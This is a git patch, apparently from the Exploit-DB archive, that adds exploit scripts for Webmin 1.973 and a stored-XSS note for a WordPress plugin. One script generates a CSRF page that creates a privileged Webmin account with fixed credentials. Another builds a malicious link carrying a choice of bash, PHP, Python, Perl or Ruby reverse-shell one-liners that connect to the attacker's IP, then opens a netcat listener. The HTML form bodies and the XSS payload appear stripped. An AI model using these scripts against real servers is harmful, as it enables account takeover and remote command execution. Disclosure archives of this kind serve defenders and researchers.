From 7014821c65ae46c8270445f8510338a7445f6271 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 21 Jul 2021 05:01:52 +0000 Subject: [PATCH] DB: 2021-07-21 3 changes to exploits/shellcodes Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF) WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS) Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF) --- exploits/linux/webapps/50126.py | 230 ++++++++++++++++++++++++++++++++ exploits/linux/webapps/50144.py | 122 +++++++++++++++++ exploits/php/webapps/50143.txt | 16 +++ files_exploits.csv | 3 + 4 files changed, 371 insertions(+) create mode 100755 exploits/linux/webapps/50126.py create mode 100755 exploits/linux/webapps/50144.py create mode 100644 exploits/php/webapps/50143.txt diff --git a/exploits/linux/webapps/50126.py b/exploits/linux/webapps/50126.py new file mode 100755 index 000000000..1f9577713 --- /dev/null +++ b/exploits/linux/webapps/50126.py @@ -0,0 +1,230 @@ +# Exploit Title: Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF) +# Date: 24/04/2021 +# Exploit Author: *Mesh3l_911 & Z0ldyck +# Vendor Homepage: https://www.webmin.com +# Repo Link: https://github.com/Mesh3l911/CVE-2021-31762 +# Version: Webmin 1.973 +# Tested on: All versions <= 1.973 +# CVE : CVE-2021-31762 +# POC: https://youtu.be/qCvEXwyaF5U + + +import time, subprocess + +print('''\033[1;37m + + __ __ _ ____ _ _________ _ _ _ +| \/ | | | |___ \| | |___ / _ \| | | | | | +| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ +| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / +| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < +|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/ + __/ | + |___/ + + \033[1;m''') + +for i in range(101): + print( + "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format( + i), "\033[1;36m%\033[1;m", end="") + time.sleep(0.02) +print("\n\n") + +target = input( + "\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m") + +if target.endswith('/'): + target = target + 'acl/save_user.cgi' +else: + target = target + '/acl/save_user.cgi' + + +def CSRF_Generator(): + with open('CSRF_POC.html', 'w') as POC: + POC.write \ + (''' + + + + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + ''') + POC.close() + + print( + "\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m") + + + +def main(): + CSRF_Generator() + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/linux/webapps/50144.py b/exploits/linux/webapps/50144.py new file mode 100755 index 000000000..da2149f35 --- /dev/null +++ b/exploits/linux/webapps/50144.py @@ -0,0 +1,122 @@ +# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF) +# Date: 24/04/2021 +# Exploit Author: Mesh3l_911 & Z0ldyck +# Vendor Homepage: https://www.webmin.com +# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761 +# Version: Webmin 1.973 +# Tested on: All versions <= 1.973 +# CVE: CVE-2021-31761 +# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to +# get a Remote Command Execution (RCE) through the Webmin's running process +# feature + +import time, subprocess,random,urllib.parse + + +print('''\033[1;37m + + __ __ _ ____ _ _________ _ _ _ +| \/ | | | |___ \| | |___ / _ \| | | | | | +| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ +| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / +| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < +|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/ + __/ | + |___/ + + \033[1;m''') + +for i in range(101): + print( + "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format( + i), "\033[1;36m%\033[1;m", end="") + time.sleep(0.02) +print("\n\n") + +target = input( + "\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m") + +if target.endswith('/'): + target = target + 'tunnel/link.cgi/' +else: + target = target + '/tunnel/link.cgi/' + +ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m") + +port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m") + +ReverseShell = input \ +('''\033[1;37m +\n +1- Bash Reverse Shell \n +2- PHP Reverse Shell \n +3- Python Reverse Shell \n +4- Perl Reverse Shell \n +5- Ruby Reverse Shell \n +\033[1;m + +\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''') + +file_name = random.randrange(1000) + +if ReverseShell == '1': + ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+'' + +elif ReverseShell == '2': + ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' ''' + +elif ReverseShell == '3': + ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ''' + +elif ReverseShell == '4': + ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ''' + +elif ReverseShell == '5': + ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ''' + +else: + print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n") + + +def CSRF_Generator(): + Payload = urllib.parse.quote(''' + + + + + + + +
+ + + + + + +
+ + + + + + ''') + + print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m") + + print(target+Payload) + +def Netcat_listener(): + print() + subprocess.run(["nc", "-nlvp "+port+""]) + + +def main(): + CSRF_Generator() + Netcat_listener() + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/php/webapps/50143.txt b/exploits/php/webapps/50143.txt new file mode 100644 index 000000000..eb0b13250 --- /dev/null +++ b/exploits/php/webapps/50143.txt @@ -0,0 +1,16 @@ +# Exploit Title: WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS) +# Date: 19/07/2021 +# Exploit Author: Aakash Choudhary +# Software Link: https://wordpress.org/plugins/kn-fix-your/ +# Version: 1.0.1 +# Category: Web Application +# Tested on Mac + +How to Reproduce this Vulnerability: + +1. Install WordPress 5.7.2 +2. Install and activate KN Fix Your Title +3. Navigate to Fix Title under Settings Tab >> Click on I have done this and enter the XSS payload into the Separator input field. +4. Click Save Changes. +5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up. +6. Payload Used: "> \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 63c4737dd..a1a9e59de 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -26046,6 +26046,7 @@ id,file,description,date,author,type,platform,port 12866,exploits/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,webapps,php, 12867,exploits/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,webapps,php, 12868,exploits/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,webapps,php, +50126,exploits/linux/webapps/50126.py,"Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF)",2021-07-14,Mesh3l_911,webapps,linux, 49439,exploits/php/webapps/49439.txt,"Life Insurance Management System 1.0 - 'client_id' SQL Injection",2021-01-18,"Aitor Herrero",webapps,php, 49440,exploits/php/webapps/49440.txt,"Life Insurance Management System 1.0 - File Upload RCE (Authenticated)",2021-01-18,"Aitor Herrero",webapps,php, 49441,exploits/php/webapps/49441.txt,"osTicket 1.14.2 - SSRF",2021-01-19,"Talat Mehmood",webapps,php, @@ -44275,3 +44276,5 @@ id,file,description,date,author,type,platform,port 50139,exploits/php/webapps/50139.txt,"WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)",2021-07-19,"Vikas Srivastava",webapps,php, 50140,exploits/php/webapps/50140.ps1,"Dolibarr ERP/CRM 10.0.6 - Login Brute Force",2021-07-19,"Creamy Chicken Soup",webapps,php, 50142,exploits/php/webapps/50142.txt,"PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection",2021-07-19,faisalfs10x,webapps,php, +50143,exploits/php/webapps/50143.txt,"WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)",2021-07-20,"Aakash Choudhary",webapps,php, +50144,exploits/linux/webapps/50144.py,"Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)",2021-07-20,Mesh3l_911,webapps,linux,